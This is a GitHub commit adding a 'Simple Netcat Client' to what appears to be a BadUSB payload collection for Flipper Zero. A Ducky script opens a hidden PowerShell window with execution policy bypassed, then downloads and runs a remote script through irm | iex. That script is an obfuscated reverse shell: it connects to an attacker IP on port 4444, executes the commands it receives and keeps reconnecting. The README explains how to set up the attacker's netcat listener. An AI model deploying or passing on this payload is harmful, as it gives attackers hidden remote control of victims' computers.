Add files via upload

This commit is contained in:
egieb
2023-12-29 15:23:21 +00:00
committed by GitHub
parent c2549dc60e
commit 2efb3d2a2a
98 changed files with 4292 additions and 0 deletions

17
Netcat-Client/README.md Normal file
View File

@@ -0,0 +1,17 @@
<h2 align="center"> Simple Netcat Client </h2>
SYNOPSIS
Opens a netcat connection to a Windows machine in Powershell
USAGE
1. Download Ncat For windows. https://nmap.org/download#windows
2. Change "YOUR IP HERE" to the attacker machine's ipv4 address (find using ipconfig on windows)
3. Open a terminal on the attacker machine and type "nc -lvp 4444"
4. Run this script on the client machine.
NOTE
The PORT number is 4444

View File

@@ -0,0 +1,20 @@
REM Title: Beigeworm's Simple Netcat Client
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send powershell commands.
REM Target: Windows 10
REM *SETUP*
REM replace IP_HERE with your netcat attacker IP Address.
REM NOTE The PORT number is 4444
REM some setup for dukie script
DEFAULT_DELAY 100
REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='IP_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Netcat-Client/main.ps1 | iex
ENTER

14
Netcat-Client/main.ps1 Normal file
View File

@@ -0,0 +1,14 @@
do{
$v = 4
$a = New-Object S`ySt`em.N`eT.`s`ock`eTs.TC`PC`li`eNt("$ip",4444)
$b = $a.GetStream();[byte[]]$c = 0..65535|%{0}
while(($d = $b.Read($c, 0, $c.Length)) -ne 0){
$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> '
$h = ([text.encoding]::ASCII).GetBytes($g)
$b.Write($h,0,$h.Length)
$b.Flush()}
$a.Close()
Sleep 10
}while ($v -le 5)